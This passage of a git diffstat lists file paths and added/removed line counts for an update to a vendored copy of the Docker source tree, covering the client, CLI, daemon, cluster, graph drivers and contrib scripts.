- .../docker/docker/cli/command/system/prune.go | 93 - .../docker/cli/command/system/version.go | 113 - .../docker/docker/cli/command/task/print.go | 161 - .../docker/docker/cli/command/trust.go | 39 - .../docker/docker/cli/command/utils.go | 87 - .../docker/docker/cli/command/volume/cmd.go | 45 - .../docker/cli/command/volume/create.go | 111 - .../docker/cli/command/volume/inspect.go | 55 - .../docker/docker/cli/command/volume/list.go | 91 - .../docker/docker/cli/command/volume/prune.go | 75 - .../docker/cli/command/volume/remove.go | 68 - .../docker/cli/compose/convert/compose.go | 116 - .../cli/compose/convert/compose_test.go | 122 - .../docker/cli/compose/convert/service.go | 416 -- .../cli/compose/convert/service_test.go | 216 - .../docker/cli/compose/convert/volume.go | 128 - .../docker/cli/compose/convert/volume_test.go | 133 - .../compose/interpolation/interpolation.go | 90 - .../interpolation/interpolation_test.go | 59 - .../docker/cli/compose/loader/example1.env | 8 - .../docker/cli/compose/loader/example2.env | 1 - .../cli/compose/loader/full-example.yml | 287 - .../docker/cli/compose/loader/loader.go | 653 -- .../docker/cli/compose/loader/loader_test.go | 800 --- .../docker/cli/compose/schema/bindata.go | 260 - .../schema/data/config_schema_v3.0.json | 383 - .../schema/data/config_schema_v3.1.json | 428 -- .../docker/cli/compose/schema/schema.go | 137 - .../docker/cli/compose/schema/schema_test.go | 52 - .../docker/cli/compose/template/template.go | 100 - .../cli/compose/template/template_test.go | 83 - .../docker/docker/cli/compose/types/types.go | 253 - .../docker/docker/cli/config/configdir.go | 25 + .../docker/docker/cli/debug/debug.go | 26 + .../docker/{utils => cli/debug}/debug_test.go | 22 +- vendor/github.com/docker/docker/cli/error.go | 2 +- .../docker/docker/cli/flags/client.go | 13 - .../docker/docker/cli/flags/common_test.go | 42 - .../github.com/docker/docker/cli/required.go | 77 +- .../docker/docker/cli/trust/trust.go | 232 - .../docker/docker/cliconfig/config.go | 120 - .../docker/docker/cliconfig/config_test.go | 621 -- .../docker/cliconfig/configfile/file.go | 183 - .../docker/cliconfig/configfile/file_test.go | 27 - .../cliconfig/credentials/credentials.go | 17 - .../cliconfig/credentials/default_store.go | 22 - .../credentials/default_store_darwin.go | 3 - .../credentials/default_store_linux.go | 3 - .../credentials/default_store_unsupported.go | 5 - .../credentials/default_store_windows.go | 3 - .../cliconfig/credentials/file_store.go | 53 - .../cliconfig/credentials/file_store_test.go | 139 - .../cliconfig/credentials/native_store.go | 144 - .../credentials/native_store_test.go | 355 - .../docker/docker/client/build_cancel.go | 21 + .../docker/docker/client/build_prune.go | 30 + .../docker/docker/client/checkpoint_create.go | 5 +- .../docker/client/checkpoint_create_test.go | 4 +- .../docker/docker/client/checkpoint_delete.go | 4 +- .../docker/client/checkpoint_delete_test.go | 4 +- .../docker/docker/client/checkpoint_list.go | 8 +- .../docker/client/checkpoint_list_test.go | 15 +- .../github.com/docker/docker/client/client.go | 326 +- .../docker/docker/client/client_mock_test.go | 10 +- .../docker/docker/client/client_test.go | 376 +- .../docker/docker/client/client_unix.go | 7 +- .../docker/docker/client/client_windows.go | 5 +- .../docker/docker/client/config_create.go | 25 + .../docker/client/config_create_test.go | 70 + .../docker/docker/client/config_inspect.go | 36 + .../docker/client/config_inspect_test.go | 103 + .../docker/docker/client/config_list.go | 38 + .../docker/docker/client/config_list_test.go | 107 + .../docker/docker/client/config_remove.go | 13 + .../docker/client/config_remove_test.go | 60 + .../docker/docker/client/config_update.go | 21 + .../docker/client/config_update_test.go | 61 + .../docker/docker/client/container_attach.go | 24 +- .../docker/docker/client/container_commit.go | 20 +- .../docker/client/container_commit_test.go | 6 +- .../docker/docker/client/container_copy.go | 30 +- .../docker/client/container_copy_test.go | 37 +- .../docker/docker/client/container_create.go | 12 +- .../docker/client/container_create_test.go | 50 +- .../docker/docker/client/container_diff.go | 10 +- .../docker/client/container_diff_test.go | 8 +- .../docker/docker/client/container_exec.go | 6 +- .../docker/client/container_exec_test.go | 5 +- .../docker/docker/client/container_export.go | 5 +- .../docker/client/container_export_test.go | 5 +- .../docker/docker/client/container_inspect.go | 21 +- .../docker/client/container_inspect_test.go | 27 +- .../docker/docker/client/container_kill.go | 5 +- .../docker/client/container_kill_test.go | 5 +- .../docker/docker/client/container_list.go | 4 +- .../docker/client/container_list_test.go | 4 +- .../docker/docker/client/container_logs.go | 38 +- .../docker/client/container_logs_test.go | 77 +- .../docker/docker/client/container_pause.go | 4 +- .../docker/client/container_pause_test.go | 5 +- .../docker/docker/client/container_prune.go | 4 +- .../docker/client/container_prune_test.go | 125 + .../docker/docker/client/container_remove.go | 6 +- .../docker/client/container_remove_test.go | 21 +- .../docker/docker/client/container_rename.go | 5 +- .../docker/client/container_rename_test.go | 5 +- .../docker/docker/client/container_resize.go | 4 +- .../docker/client/container_resize_test.go | 4 +- .../docker/docker/client/container_restart.go | 4 +- .../docker/client/container_restart_test.go | 5 +- .../docker/docker/client/container_start.go | 5 +- .../docker/client/container_start_test.go | 5 +- .../docker/docker/client/container_stats.go | 4 +- .../docker/client/container_stats_test.go | 5 +- .../docker/docker/client/container_stop.go | 13 +- .../docker/client/container_stop_test.go | 5 +- .../docker/docker/client/container_top.go | 10 +- .../docker/client/container_top_test.go | 8 +- .../docker/docker/client/container_unpause.go | 4 +- .../docker/client/container_unpause_test.go | 5 +- .../docker/docker/client/container_update.go | 4 +- .../docker/client/container_update_test.go | 4 +- .../docker/docker/client/container_wait.go | 85 +- .../docker/client/container_wait_test.go | 35 +- .../docker/docker/client/disk_usage.go | 4 +- .../docker/docker/client/disk_usage_test.go | 55 + .../docker/client/distribution_inspect.go | 38 + .../client/distribution_inspect_test.go | 32 + .../github.com/docker/docker/client/errors.go | 224 +- .../github.com/docker/docker/client/events.go | 5 +- .../docker/docker/client/events_test.go | 5 +- .../github.com/docker/docker/client/hijack.go | 186 +- .../docker/docker/client/hijack_test.go | 103 + .../docker/docker/client/image_build.go | 28 +- .../docker/docker/client/image_build_test.go | 9 +- .../docker/docker/client/image_create.go | 17 +- .../docker/docker/client/image_create_test.go | 5 +- .../docker/docker/client/image_history.go | 10 +- .../docker/client/image_history_test.go | 8 +- .../docker/docker/client/image_import.go | 11 +- .../docker/docker/client/image_import_test.go | 6 +- .../docker/docker/client/image_inspect.go | 13 +- .../docker/client/image_inspect_test.go | 19 +- .../docker/docker/client/image_list.go | 4 +- .../docker/docker/client/image_list_test.go | 4 +- .../docker/docker/client/image_load.go | 5 +- .../docker/docker/client/image_load_test.go | 5 +- .../docker/docker/client/image_prune.go | 4 +- .../docker/docker/client/image_prune_test.go | 120 + .../docker/docker/client/image_pull.go | 36 +- .../docker/docker/client/image_pull_test.go | 7 +- .../docker/docker/client/image_push.go | 23 +- .../docker/docker/client/image_push_test.go | 7 +- .../docker/docker/client/image_remove.go | 10 +- .../docker/docker/client/image_remove_test.go | 20 +- .../docker/docker/client/image_save.go | 5 +- .../docker/docker/client/image_save_test.go | 8 +- .../docker/docker/client/image_search.go | 6 +- .../docker/docker/client/image_search_test.go | 7 +- .../docker/docker/client/image_tag.go | 33 +- .../docker/docker/client/image_tag_test.go | 31 +- .../github.com/docker/docker/client/info.go | 4 +- .../docker/docker/client/info_test.go | 4 +- .../docker/docker/client/interface.go | 71 +- .../docker/client/interface_experimental.go | 5 +- .../docker/docker/client/interface_stable.go | 2 +- .../github.com/docker/docker/client/login.go | 6 +- .../docker/docker/client/network_connect.go | 5 +- .../docker/client/network_connect_test.go | 9 +- .../docker/docker/client/network_create.go | 4 +- .../docker/client/network_create_test.go | 4 +- .../docker/client/network_disconnect.go | 5 +- .../docker/client/network_disconnect_test.go | 4 +- .../docker/docker/client/network_inspect.go | 35 +- .../docker/client/network_inspect_test.go | 79 +- .../docker/docker/client/network_list.go | 4 +- .../docker/docker/client/network_list_test.go | 4 +- .../docker/docker/client/network_prune.go | 4 +- .../docker/client/network_prune_test.go | 113 + .../docker/docker/client/network_remove.go | 6 +- .../docker/client/network_remove_test.go | 5 +- .../docker/docker/client/node_inspect.go | 13 +- .../docker/docker/client/node_inspect_test.go | 21 +- .../docker/docker/client/node_list.go | 6 +- .../docker/docker/client/node_list_test.go | 4 +- .../docker/docker/client/node_remove.go | 7 +- .../docker/docker/client/node_remove_test.go | 5 +- .../docker/docker/client/node_update.go | 4 +- .../docker/docker/client/node_update_test.go | 5 +- .../github.com/docker/docker/client/ping.go | 22 +- .../docker/docker/client/ping_test.go | 83 + .../docker/docker/client/plugin_create.go | 6 +- .../docker/docker/client/plugin_disable.go | 4 +- .../docker/client/plugin_disable_test.go | 4 +- .../docker/docker/client/plugin_enable.go | 4 +- .../docker/client/plugin_enable_test.go | 4 +- .../docker/docker/client/plugin_inspect.go | 13 +- .../docker/client/plugin_inspect_test.go | 17 +- .../docker/docker/client/plugin_install.go | 10 +- .../docker/docker/client/plugin_list.go | 21 +- .../docker/docker/client/plugin_list_test.go | 108 +- .../docker/docker/client/plugin_push.go | 5 +- .../docker/docker/client/plugin_push_test.go | 5 +- .../docker/docker/client/plugin_remove.go | 6 +- .../docker/client/plugin_remove_test.go | 7 +- .../docker/docker/client/plugin_set.go | 4 +- .../docker/docker/client/plugin_set_test.go | 5 +- .../docker/docker/client/plugin_upgrade.go | 12 +- .../docker/docker/client/request.go | 78 +- .../docker/docker/client/request_test.go | 23 +- .../docker/docker/client/secret_create.go | 11 +- .../docker/client/secret_create_test.go | 21 +- .../docker/docker/client/secret_inspect.go | 16 +- .../docker/client/secret_inspect_test.go | 41 +- .../docker/docker/client/secret_list.go | 9 +- .../docker/docker/client/secret_list_test.go | 21 +- .../docker/docker/client/secret_remove.go | 9 +- .../docker/client/secret_remove_test.go | 21 +- .../docker/docker/client/secret_update.go | 10 +- .../docker/client/secret_update_test.go | 22 +- .../docker/docker/client/service_create.go | 146 +- .../docker/client/service_create_test.go | 158 +- .../docker/docker/client/service_inspect.go | 22 +- .../docker/client/service_inspect_test.go | 28 +- .../docker/docker/client/service_list.go | 6 +- .../docker/docker/client/service_list_test.go | 4 +- .../docker/docker/client/service_logs.go | 8 +- .../docker/docker/client/service_logs_test.go | 46 +- .../docker/docker/client/service_remove.go | 6 +- .../docker/client/service_remove_test.go | 18 +- .../docker/docker/client/service_update.go | 63 +- .../docker/client/service_update_test.go | 5 +- .../docker/docker/client/session.go | 18 + .../docker/client/swarm_get_unlock_key.go | 4 +- .../client/swarm_get_unlock_key_test.go | 59 + .../docker/docker/client/swarm_init.go | 6 +- .../docker/docker/client/swarm_init_test.go | 5 +- .../docker/docker/client/swarm_inspect.go | 6 +- .../docker/client/swarm_inspect_test.go | 4 +- .../docker/docker/client/swarm_join.go | 7 +- .../docker/docker/client/swarm_join_test.go | 5 +- .../docker/docker/client/swarm_leave.go | 7 +- .../docker/docker/client/swarm_leave_test.go | 5 +- .../docker/docker/client/swarm_unlock.go | 11 +- .../docker/docker/client/swarm_unlock_test.go | 48 + .../docker/docker/client/swarm_update.go | 6 +- .../docker/docker/client/swarm_update_test.go | 5 +- .../docker/docker/client/task_inspect.go | 14 +- .../docker/docker/client/task_inspect_test.go | 17 +- .../docker/docker/client/task_list.go | 6 +- .../docker/docker/client/task_list_test.go | 4 +- .../docker/docker/client/task_logs.go | 51 + .../docker/docker/client/transport.go | 15 +- .../github.com/docker/docker/client/utils.go | 7 +- .../docker/docker/client/version.go | 4 +- .../docker/docker/client/volume_create.go | 6 +- .../docker/client/volume_create_test.go | 8 +- .../docker/docker/client/volume_inspect.go | 14 +- .../docker/client/volume_inspect_test.go | 53 +- .../docker/docker/client/volume_list.go | 8 +- .../docker/docker/client/volume_list_test.go | 6 +- .../docker/docker/client/volume_prune.go | 6 +- .../docker/docker/client/volume_remove.go | 6 +- .../docker/client/volume_remove_test.go | 5 +- .../docker/docker/cmd/docker/daemon_none.go | 27 - .../docker/cmd/docker/daemon_none_test.go | 17 - .../docker/cmd/docker/daemon_unit_test.go | 30 - .../docker/docker/cmd/docker/daemon_unix.go | 79 - .../docker/docker/cmd/docker/docker.go | 180 - .../docker/docker/cmd/docker/docker_test.go | 32 - .../docker/cmd/docker/docker_windows.go | 18 - .../docker/docker/cmd/dockerd/config.go | 99 + .../docker/cmd/dockerd/config_common_unix.go | 34 + .../docker/docker/cmd/dockerd/config_unix.go | 50 + .../docker/cmd/dockerd/config_unix_test.go | 23 + .../docker/cmd/dockerd/config_windows.go | 26 + .../docker/docker/cmd/dockerd/daemon.go | 590 +- .../docker/cmd/dockerd/daemon_freebsd.go | 4 + .../docker/docker/cmd/dockerd/daemon_linux.go | 8 +- .../docker/cmd/dockerd/daemon_solaris.go | 85 - .../docker/docker/cmd/dockerd/daemon_test.go | 149 +- .../docker/docker/cmd/dockerd/daemon_unix.go | 76 +- .../docker/cmd/dockerd/daemon_unix_test.go | 95 +- .../docker/cmd/dockerd/daemon_windows.go | 47 +- .../docker/docker/cmd/dockerd/docker.go | 77 +- .../docker/docker/cmd/dockerd/docker_unix.go | 8 + .../docker/cmd/dockerd/docker_windows.go | 36 +- .../dockerd/hack/malformed_host_override.go | 4 +- .../hack/malformed_host_override_test.go | 2 +- .../docker/docker/cmd/dockerd/metrics.go | 4 +- .../common.go => cmd/dockerd/options.go} | 76 +- .../docker/docker/cmd/dockerd/options_test.go | 44 + .../docker/cmd/dockerd/service_unsupported.go | 4 - .../docker/cmd/dockerd/service_windows.go | 50 +- vendor/github.com/docker/docker/codecov.yml | 17 + .../docker/docker/container/archive.go | 32 +- .../docker/docker/container/container.go | 859 +-- .../docker/container/container_linux.go | 9 - .../docker/container/container_notlinux.go | 23 - .../docker/container/container_unit_test.go | 96 +- .../docker/docker/container/container_unix.go | 337 +- .../docker/container/container_windows.go | 200 +- .../github.com/docker/docker/container/env.go | 43 + .../utils_test.go => container/env_test.go} | 9 +- .../docker/docker/container/health.go | 55 +- .../docker/docker/container/history.go | 2 +- .../docker/docker/container/memory_store.go | 2 +- .../docker/container/memory_store_test.go | 6 +- .../docker/docker/container/monitor.go | 4 +- .../docker/docker/container/mounts_unix.go | 2 +- .../docker/docker/container/mounts_windows.go | 2 +- .../docker/docker/container/state.go | 256 +- .../docker/docker/container/state_solaris.go | 7 - .../docker/docker/container/state_test.go | 155 +- .../docker/docker/container/state_unix.go | 10 - .../docker/docker/container/state_windows.go | 7 - .../docker/docker/container/store.go | 2 +- .../docker/docker/container/stream/attach.go | 175 + .../docker/docker/container/stream/streams.go | 17 +- .../docker/docker/container/view.go | 494 ++ .../docker/docker/container/view_test.go | 186 + .../contrib/builder/deb/aarch64/build.sh | 10 - .../contrib/builder/deb/aarch64/generate.sh | 118 - .../deb/aarch64/ubuntu-trusty/Dockerfile | 24 - .../deb/aarch64/ubuntu-xenial/Dockerfile | 22 - .../contrib/builder/deb/amd64/README.md | 5 - .../docker/contrib/builder/deb/amd64/build.sh | 10 - .../deb/amd64/debian-jessie/Dockerfile | 20 - .../deb/amd64/debian-stretch/Dockerfile | 20 - .../deb/amd64/debian-wheezy/Dockerfile | 22 - .../contrib/builder/deb/amd64/generate.sh | 149 - .../deb/amd64/ubuntu-precise/Dockerfile | 16 - .../deb/amd64/ubuntu-trusty/Dockerfile | 16 - .../deb/amd64/ubuntu-xenial/Dockerfile | 16 - .../deb/amd64/ubuntu-yakkety/Dockerfile | 16 - .../deb/armhf/debian-jessie/Dockerfile | 20 - .../contrib/builder/deb/armhf/generate.sh | 158 - .../deb/armhf/raspbian-jessie/Dockerfile | 22 - .../deb/armhf/ubuntu-trusty/Dockerfile | 16 - .../deb/armhf/ubuntu-xenial/Dockerfile | 16 - .../deb/armhf/ubuntu-yakkety/Dockerfile | 16 - .../contrib/builder/deb/ppc64le/build.sh | 10 - .../contrib/builder/deb/ppc64le/generate.sh | 103 - .../deb/ppc64le/ubuntu-trusty/Dockerfile | 16 - .../deb/ppc64le/ubuntu-xenial/Dockerfile | 16 - .../deb/ppc64le/ubuntu-yakkety/Dockerfile | 16 - .../docker/contrib/builder/deb/s390x/build.sh | 10 - .../contrib/builder/deb/s390x/generate.sh | 96 - .../deb/s390x/ubuntu-xenial/Dockerfile | 16 - .../contrib/builder/rpm/amd64/README.md | 5 - .../docker/contrib/builder/rpm/amd64/build.sh | 10 - .../builder/rpm/amd64/centos-7/Dockerfile | 19 - .../builder/rpm/amd64/fedora-24/Dockerfile | 19 - .../builder/rpm/amd64/fedora-25/Dockerfile | 19 - .../contrib/builder/rpm/amd64/generate.sh | 189 - .../rpm/amd64/opensuse-13.2/Dockerfile | 18 - .../rpm/amd64/oraclelinux-6/Dockerfile | 28 - .../rpm/amd64/oraclelinux-7/Dockerfile | 18 - .../builder/rpm/amd64/photon-1.0/Dockerfile | 18 - .../docker/docker/contrib/check-config.sh | 10 +- .../docker/contrib/completion/REVIEWERS | 2 - .../docker/contrib/completion/bash/docker | 4282 ------------ .../contrib/completion/fish/docker.fish | 405 -- .../contrib/completion/powershell/readme.txt | 1 - .../docker/contrib/completion/zsh/REVIEWERS | 2 - .../docker/contrib/completion/zsh/_docker | 2787 -------- .../desktop-integration/chromium/Dockerfile | 2 +- .../desktop-integration/gparted/Dockerfile | 2 +- .../contrib/docker-device-tool/device_tool.go | 15 +- .../contrib/docker-machine-install-bundle.sh | 111 + .../contrib/download-frozen-image-v1.sh | 2 +- .../contrib/download-frozen-image-v2.sh | 308 +- .../docker/docker/contrib/gitdm/domain-map | 10 +- .../docker/contrib/gitdm/generate_aliases.sh | 2 +- .../contrib/httpserver/Dockerfile.solaris | 4 - .../docker/contrib/init/openrc/docker.confd | 10 + .../docker/contrib/init/openrc/docker.initd | 4 +- .../contrib/init/systemd/docker.service | 7 +- .../contrib/init/systemd/docker.service.rpm | 7 +- .../contrib/init/sysvinit-debian/docker | 10 +- .../docker/docker/contrib/mkimage-alpine.sh | 13 +- .../docker/docker/contrib/mkimage-busybox.sh | 43 - .../docker/contrib/mkimage-debootstrap.sh | 297 - .../docker/docker/contrib/mkimage-rinse.sh | 123 - .../docker/docker/contrib/mkimage-yum.sh | 4 +- .../docker/docker/contrib/mkimage.sh | 8 - .../docker/docker/contrib/mkimage/debootstrap | 29 +- .../docker/docker/contrib/mkimage/solaris | 89 - .../docker/contrib/nuke-graph-directory.sh | 2 +- .../docker/docker/contrib/project-stats.sh | 22 - .../docker/docker/contrib/reprepro/suites.sh | 12 - .../docker-engine-selinux/LICENSE | 339 - .../docker-engine-selinux/Makefile | 23 - .../docker-engine-selinux/README.md | 1 - .../docker-engine-selinux/docker.fc | 29 - .../docker-engine-selinux/docker.if | 523 -- .../docker-engine-selinux/docker.te | 399 -- .../docker-engine-selinux/LICENSE | 339 - .../docker-engine-selinux/Makefile | 23 - .../docker-engine-selinux/README.md | 1 - .../docker-engine-selinux/docker.fc | 33 - .../docker-engine-selinux/docker.if | 659 -- .../docker-engine-selinux/docker.te | 465 -- .../selinux/docker-engine-selinux/LICENSE | 340 - .../selinux/docker-engine-selinux/Makefile | 16 - .../selinux/docker-engine-selinux/docker.fc | 18 - .../selinux/docker-engine-selinux/docker.if | 461 -- .../selinux/docker-engine-selinux/docker.te | 407 -- .../docker-engine-selinux/docker_selinux.8.gz | Bin 2847 -> 0 bytes .../Syntaxes/Dockerfile.tmLanguage | 21 +- .../syntax/vim/ftdetect/dockerfile.vim | 2 +- .../docker/docker/contrib/syscall-test/ns.c | 2 +- .../docker/contrib/syscall-test/userns.c | 2 +- .../docker/contrib/vagrant-docker/README.md | 4 +- .../docker/docker/daemon/apparmor_default.go | 4 +- .../daemon/apparmor_default_unsupported.go | 2 +- .../docker/docker/daemon/archive.go | 273 +- .../docker/daemon/archive_tarcopyoptions.go | 15 + .../daemon/archive_tarcopyoptions_unix.go | 25 + .../daemon/archive_tarcopyoptions_windows.go | 10 + .../docker/docker/daemon/archive_unix.go | 43 +- .../docker/docker/daemon/archive_windows.go | 29 +- .../github.com/docker/docker/daemon/attach.go | 154 +- .../github.com/docker/docker/daemon/auth.go | 4 +- .../docker/docker/daemon/bindmount_solaris.go | 5 - .../docker/docker/daemon/bindmount_unix.go | 2 +- .../daemon/caps/{utils_unix.go => utils.go} | 28 +- .../docker/docker/daemon/changes.go | 5 +- .../docker/docker/daemon/checkpoint.go | 79 +- .../docker/docker/daemon/cluster.go | 16 +- .../docker/docker/daemon/cluster/cluster.go | 1959 +----- .../docker/docker/daemon/cluster/configs.go | 118 + .../cluster/controllers/plugin/controller.go | 261 + .../controllers/plugin/controller_test.go | 390 ++ .../docker/daemon/cluster/convert/config.go | 78 + .../daemon/cluster/convert/container.go | 255 +- .../docker/daemon/cluster/convert/network.go | 86 +- .../daemon/cluster/convert/network_test.go | 34 + .../docker/daemon/cluster/convert/node.go | 21 +- .../docker/daemon/cluster/convert/secret.go | 38 +- .../docker/daemon/cluster/convert/service.go | 445 +- .../daemon/cluster/convert/service_test.go | 308 + .../docker/daemon/cluster/convert/swarm.go | 47 +- .../docker/daemon/cluster/convert/task.go | 62 +- .../docker/docker/daemon/cluster/errors.go | 61 + .../docker/daemon/cluster/executor/backend.go | 38 +- .../cluster/executor/container/adapter.go | 144 +- .../cluster/executor/container/attachment.go | 21 +- .../cluster/executor/container/container.go | 198 +- .../executor/container/container_test.go | 37 + .../cluster/executor/container/controller.go | 188 +- .../cluster/executor/container/errors.go | 12 +- .../cluster/executor/container/executor.go | 155 +- .../cluster/executor/container/health_test.go | 22 +- .../cluster/executor/container/validate.go | 5 +- .../executor/container/validate_test.go | 7 +- .../executor/container/validate_unix_test.go | 2 +- .../container/validate_windows_test.go | 2 +- .../docker/docker/daemon/cluster/filters.go | 41 +- .../docker/daemon/cluster/filters_test.go | 102 + .../docker/docker/daemon/cluster/helpers.go | 260 +- .../docker/daemon/cluster/listen_addr.go | 125 +- .../daemon/cluster/listen_addr_linux.go | 4 +- .../daemon/cluster/listen_addr_others.go | 4 +- .../daemon/cluster/listen_addr_solaris.go | 57 - .../docker/docker/daemon/cluster/networks.go | 316 + .../docker/daemon/cluster/noderunner.go | 388 ++ .../docker/docker/daemon/cluster/nodes.go | 105 + .../docker/daemon/cluster/provider/network.go | 2 +- .../docker/docker/daemon/cluster/secrets.go | 147 +- .../docker/docker/daemon/cluster/services.go | 602 ++ .../docker/docker/daemon/cluster/swarm.go | 569 ++ .../docker/docker/daemon/cluster/tasks.go | 87 + .../docker/docker/daemon/cluster/utils.go | 63 + .../github.com/docker/docker/daemon/commit.go | 165 +- .../docker/daemon/{ => config}/config.go | 296 +- .../daemon/config/config_common_unix.go | 71 + .../daemon/config/config_common_unix_test.go | 84 + .../docker/daemon/config/config_test.go | 518 ++ .../docker/daemon/config/config_unix.go | 87 + .../docker/daemon/config/config_unix_test.go | 134 + .../docker/daemon/config/config_windows.go | 57 + .../daemon/config/config_windows_test.go | 60 + .../docker/docker/daemon/config/opts.go | 22 + .../docker/daemon/config_common_unix.go | 90 - .../docker/daemon/config_experimental.go | 8 - .../docker/docker/daemon/config_solaris.go | 47 - .../docker/docker/daemon/config_test.go | 229 - .../docker/docker/daemon/config_unix.go | 104 - .../docker/docker/daemon/config_unix_test.go | 80 - .../docker/docker/daemon/config_windows.go | 71 - .../docker/daemon/config_windows_test.go | 59 - .../docker/docker/daemon/configs.go | 21 + .../docker/docker/daemon/configs_linux.go | 5 + .../docker/daemon/configs_unsupported.go | 7 + .../docker/docker/daemon/configs_windows.go | 5 + .../docker/docker/daemon/container.go | 144 +- .../docker/docker/daemon/container_linux.go | 30 + .../docker/daemon/container_operations.go | 243 +- .../daemon/container_operations_solaris.go | 46 - .../daemon/container_operations_unix.go | 288 +- .../daemon/container_operations_windows.go | 160 +- .../docker/daemon/container_unix_test.go | 44 + .../docker/docker/daemon/container_windows.go | 9 + .../github.com/docker/docker/daemon/create.go | 194 +- .../docker/docker/daemon/create_test.go | 21 + .../docker/docker/daemon/create_unix.go | 33 +- .../docker/docker/daemon/create_windows.go | 35 +- .../github.com/docker/docker/daemon/daemon.go | 1105 ++- .../docker/daemon/daemon_experimental.go | 7 - .../docker/docker/daemon/daemon_linux.go | 61 +- .../docker/docker/daemon/daemon_linux_test.go | 226 +- .../docker/docker/daemon/daemon_solaris.go | 523 -- .../docker/docker/daemon/daemon_test.go | 394 +- .../docker/docker/daemon/daemon_unix.go | 714 +- .../docker/docker/daemon/daemon_unix_test.go | 167 +- .../docker/daemon/daemon_unsupported.go | 4 +- .../docker/docker/daemon/daemon_windows.go | 277 +- .../docker/daemon/daemon_windows_test.go | 72 + .../docker/docker/daemon/debugtrap.go | 62 - .../docker/docker/daemon/debugtrap_unix.go | 14 +- .../docker/daemon/debugtrap_unsupported.go | 4 +- .../docker/docker/daemon/debugtrap_windows.go | 28 +- .../github.com/docker/docker/daemon/delete.go | 106 +- .../docker/docker/daemon/delete_test.go | 92 +- .../docker/docker/daemon/dependency.go | 17 + .../daemon/{ => discovery}/discovery.go | 35 +- .../docker/daemon/discovery/discovery_test.go | 96 + .../docker/docker/daemon/discovery_test.go | 164 - .../docker/docker/daemon/disk_usage.go | 78 +- .../github.com/docker/docker/daemon/errors.go | 166 +- .../github.com/docker/docker/daemon/events.go | 226 +- .../docker/docker/daemon/events/events.go | 21 +- .../docker/daemon/events/events_test.go | 27 +- .../docker/docker/daemon/events/filter.go | 38 +- .../docker/docker/daemon/events/metrics.go | 2 +- .../daemon/events/testutils/testutils.go | 2 +- .../docker/docker/daemon/events_test.go | 34 +- .../github.com/docker/docker/daemon/exec.go | 152 +- .../docker/docker/daemon/exec/exec.go | 60 +- .../docker/docker/daemon/exec_linux.go | 42 +- .../docker/docker/daemon/exec_linux_test.go | 53 + .../docker/docker/daemon/exec_solaris.go | 11 - .../docker/docker/daemon/exec_windows.go | 12 +- .../github.com/docker/docker/daemon/export.go | 54 +- .../docker/docker/daemon/getsize_unix.go | 41 - .../docker/daemon/graphdriver/aufs/aufs.go | 235 +- .../daemon/graphdriver/aufs/aufs_test.go | 173 +- .../docker/daemon/graphdriver/aufs/dirs.go | 6 +- .../docker/daemon/graphdriver/aufs/mount.go | 12 +- .../daemon/graphdriver/aufs/mount_linux.go | 6 +- .../graphdriver/aufs/mount_unsupported.go | 2 +- .../docker/daemon/graphdriver/btrfs/btrfs.go | 285 +- .../daemon/graphdriver/btrfs/btrfs_test.go | 6 +- .../graphdriver/btrfs/dummy_unsupported.go | 2 +- .../daemon/graphdriver/btrfs/version.go | 2 +- .../daemon/graphdriver/btrfs/version_none.go | 2 +- .../daemon/graphdriver/btrfs/version_test.go | 4 +- .../docker/daemon/graphdriver/copy/copy.go | 277 + .../daemon/graphdriver/copy/copy_test.go | 159 + .../docker/daemon/graphdriver/counter.go | 39 +- .../daemon/graphdriver/devmapper/README.md | 16 +- .../graphdriver/devmapper/device_setup.go | 231 + .../daemon/graphdriver/devmapper/deviceset.go | 661 +- .../graphdriver/devmapper/devmapper_doc.go | 2 +- .../graphdriver/devmapper/devmapper_test.go | 107 +- .../daemon/graphdriver/devmapper/driver.go | 121 +- .../daemon/graphdriver/devmapper/mount.go | 25 +- .../docker/daemon/graphdriver/driver.go | 81 +- .../daemon/graphdriver/driver_freebsd.go | 16 +- .../docker/daemon/graphdriver/driver_linux.go | 31 +- .../daemon/graphdriver/driver_solaris.go | 97 - .../docker/daemon/graphdriver/driver_test.go | 36 + .../daemon/graphdriver/driver_unsupported.go | 10 +- .../daemon/graphdriver/driver_windows.go | 8 +- .../docker/daemon/graphdriver/errors.go | 36 + .../docker/daemon/graphdriver/fsdiff.go | 30 +- .../graphdriver/graphtest/graphbench_unix.go | 12 +- .../graphdriver/graphtest/graphtest_unix.go | 92 +- .../graphtest/graphtest_windows.go | 2 +- .../daemon/graphdriver/graphtest/testutil.go | 91 +- .../graphdriver/graphtest/testutil_unix.go | 140 +- .../docker/daemon/graphdriver/lcow/lcow.go | 1052 +++ .../daemon/graphdriver/lcow/lcow_svm.go | 378 + .../daemon/graphdriver/lcow/remotefs.go | 139 + .../daemon/graphdriver/lcow/remotefs_file.go | 211 + .../graphdriver/lcow/remotefs_filedriver.go | 123 + .../graphdriver/lcow/remotefs_pathdriver.go | 212 + .../docker/daemon/graphdriver/overlay/copy.go | 174 - .../daemon/graphdriver/overlay/overlay.go | 192 +- .../graphdriver/overlay/overlay_test.go | 2 +- .../overlay/overlay_unsupported.go | 2 +- .../daemon/graphdriver/overlay2/check.go | 75 +- .../daemon/graphdriver/overlay2/mount.go | 11 +- .../daemon/graphdriver/overlay2/overlay.go | 273 +- .../graphdriver/overlay2/overlay_test.go | 14 +- .../overlay2/overlay_unsupported.go | 2 +- .../daemon/graphdriver/overlay2/randomid.go | 7 +- .../graphdriver/overlayutils/overlayutils.go | 15 +- .../docker/daemon/graphdriver/plugin.go | 40 +- .../docker/docker/daemon/graphdriver/proxy.go | 100 +- .../docker/daemon/graphdriver/quota/errors.go | 19 + .../daemon/graphdriver/quota/projectquota.go | 87 +- .../graphdriver/quota/projectquota_test.go | 152 + .../graphdriver/register/register_aufs.go | 2 +- .../graphdriver/register/register_btrfs.go | 2 +- .../register/register_devicemapper.go | 4 +- .../graphdriver/register/register_overlay.go | 3 +- .../graphdriver/register/register_overlay2.go | 8 + .../graphdriver/register/register_vfs.go | 2 +- .../graphdriver/register/register_windows.go | 5 +- .../graphdriver/register/register_zfs.go | 4 +- .../daemon/graphdriver/vfs/copy_linux.go | 7 + .../graphdriver/vfs/copy_unsupported.go | 9 + .../docker/daemon/graphdriver/vfs/driver.go | 94 +- .../daemon/graphdriver/vfs/quota_linux.go | 26 + .../graphdriver/vfs/quota_unsupported.go | 20 + .../docker/daemon/graphdriver/vfs/vfs_test.go | 6 +- .../daemon/graphdriver/windows/windows.go | 140 +- .../docker/daemon/graphdriver/zfs/zfs.go | 100 +- .../daemon/graphdriver/zfs/zfs_freebsd.go | 12 +- .../daemon/graphdriver/zfs/zfs_linux.go | 23 +- 